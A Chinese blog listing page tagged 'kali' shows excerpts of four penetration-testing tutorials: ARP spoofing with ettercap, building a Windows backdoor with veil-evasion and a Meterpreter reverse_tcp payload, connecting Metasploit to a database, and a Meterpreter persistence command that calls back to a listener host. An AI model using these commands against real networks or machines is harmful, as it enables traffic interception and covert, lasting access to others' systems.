kali
盗才生
这个作者很懒,什么都没留下…
展开
-
ettercap进行arp欺骗攻击
开启IP转发 echo 1 >/proc/sys/net/ipv4/ip_forward Cat 查看内容 cat /proc/sys/net/ipv4/ip_forward ettercap -i wlan0 -Tq -M arp:remote /172.19.73.1-253/ /172.19.73.254/ 其中: -Tq -- 》-T原创 2015-09-11 08:25:17 · 5299 阅读 · 0 评论 -
Metasploit使用后门程序渗透Windows
终端中运行 veil-evasion 输入list查看可用模块 这里使用 7) c/shellcode_inject/flatc 输入 use 7 generate 1 (default) 回车选择默认的 windows/meterpreter/reverse_tcp tab 选择本地IP 也可以自己输入指定IP 端口 用默认的 4444 回车 回车 G原创 2015-09-11 08:45:51 · 3860 阅读 · 0 评论 -
kali2.0 msf连接数据库及启动armitage
msf连接数据库 启动postgresql 服务: service postgresql start 进入 postgres: su postgres 输入如下命令创建一个postgresql数据库账户: createuser msf3 –P 命令中的msf3就是要创建的用户,当然你可以输入任何其他用户名。 接着,终端中会提示你输入密码,然后确认密码,这原创 2016-04-09 13:00:54 · 9519 阅读 · 0 评论 -
Meterpreter 建立持久后门 backdoor
安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 609628 bytes long RunningPersistance Script Resource filefor cleanup created at /root/.msf4/logs/转载 2016-05-06 17:56:51 · 9874 阅读 · 1 评论